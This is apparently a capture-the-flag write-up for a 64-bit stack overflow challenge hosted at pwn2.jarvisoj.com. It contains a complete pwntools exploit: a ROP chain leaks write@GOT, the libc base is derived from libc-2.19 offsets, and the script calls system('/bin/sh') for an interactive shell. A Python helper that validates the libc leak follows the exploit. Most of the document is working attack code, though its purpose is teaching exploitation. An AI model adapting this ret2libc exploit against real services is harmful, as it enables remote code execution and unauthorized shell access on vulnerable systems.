Similar to level2_x64, this is also a 64-bit program, but it does not call the system function directly and contains no "/bin/sh" argument; only a libc library is provided. So we have to leak the address of system and of "/bin/sh" through that libc. Note that, as before, the issue is registers (x64 passes arguments in registers), so we have to build gadgets and bypass with ROP: leak the address of system, then write the "/bin/sh" argument into the bss section and call system to get a shell.
from pwn import *

p = remote('pwn2.jarvisoj.com', 9883)

# addresses in the (non-PIE) binary
write_plt = 0x04004B0
write_got = 0x0600A58
start = 0x04004F0         # _start: restart the program after the leak
poprdiret = 0x04006b3     # pop rdi; ret
poprsiret = 0x04006b1     # pop rsi; pop r15; ret

# offsets inside the provided libc-2.19.so
write_libc_address = 0x00000000000eb700   # readelf -a ./libc-2.19.so | grep " write@"
bin_sh_libc_address = 0x17c8c3            # strings -a -t x libc-2.19.so | grep "/bin/sh"
system_libc_address = 0x0000000000046590  # readelf -a ./libc-2.19.so | grep " system@"
exit_libc_address = 0x000000000003c1e0    # readelf -a ./libc-2.19.so | grep " exit@"

# stage 1: write(1, write_got, <rdx left over from the previous call>) leaks the
# address of write in libc, then return to _start so we can send a second payload.
# The second p64(1) fills r15, which the "pop rsi; pop r15; ret" gadget also pops.
payload1 = b'\x00' * (0x80 + 8)
payload1 += p64(poprdiret) + p64(1)
payload1 += p64(poprsiret) + p64(write_got) + p64(1)
payload1 += p64(write_plt) + p64(start)
p.recvuntil(b"Input:\n")
p.sendline(payload1)
leak = u64(p.recv(8))
log.info("write@libc = %#x" % leak)

# stage 2: compute the libc base and the addresses we need from it
libc_base = leak - write_libc_address
system = libc_base + system_libc_address
binsh = libc_base + bin_sh_libc_address   # "/bin/sh" string inside libc
exit_addr = libc_base + exit_libc_address

# system("/bin/sh"), then exit() so the process ends cleanly
payload = b'a' * (0x80 + 8) + p64(poprdiret) + p64(binsh) + p64(system) + p64(exit_addr)
p.recvuntil(b"Input:\n")
p.sendline(payload)
p.interactive()
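The step the writeup glosses over is "libc_base = leak - offset": that only works if the leak really is the address of write in the same libc build. The helper below is an added example (not part of the writeup's script) that resolves the base from the page's libc-2.19 offsets and checks the low 12 bits, since libc is page-aligned and a mismatch means a wrong libc, a short read or junk on the stack; the sample base value in the test is constructed.

```python
import struct

# libc-2.19 offsets taken from the readelf / strings output quoted in the writeup
WRITE_OFF = 0x0eb700
SYSTEM_OFF = 0x046590
BINSH_OFF = 0x17c8c3
EXIT_OFF = 0x03c1e0


def u64(data: bytes) -> int:
    """Unpack exactly 8 little-endian bytes (what pwntools' u64 does)."""
    if len(data) != 8:
        raise ValueError("expected exactly 8 bytes, got %d" % len(data))
    return struct.unpack("<Q", data)[0]


def resolve_libc(leaked_write: int) -> dict:
    """Derive the libc base from a leaked write() address and sanity-check it.

    libc is mapped page-aligned, so the low 12 bits of the leaked address
    must equal the low 12 bits of write's offset inside libc. If they differ,
    the offsets belong to a different libc build or the leak is garbage.
    """
    if (leaked_write & 0xfff) != (WRITE_OFF & 0xfff):
        raise ValueError("leak %#x does not match write offset %#x (wrong libc?)"
                         % (leaked_write, WRITE_OFF))
    base = leaked_write - WRITE_OFF
    if base & 0xfff:
        raise ValueError("computed base %#x is not page-aligned" % base)
    return {
        "base": base,
        "system": base + SYSTEM_OFF,
        "binsh": base + BINSH_OFF,
        "exit": base + EXIT_OFF,
    }


def resolve_from_leak_bytes(raw: bytes) -> dict:
    """Take the 8 raw bytes that write() sent back and resolve the addresses."""
    return resolve_libc(u64(raw))
```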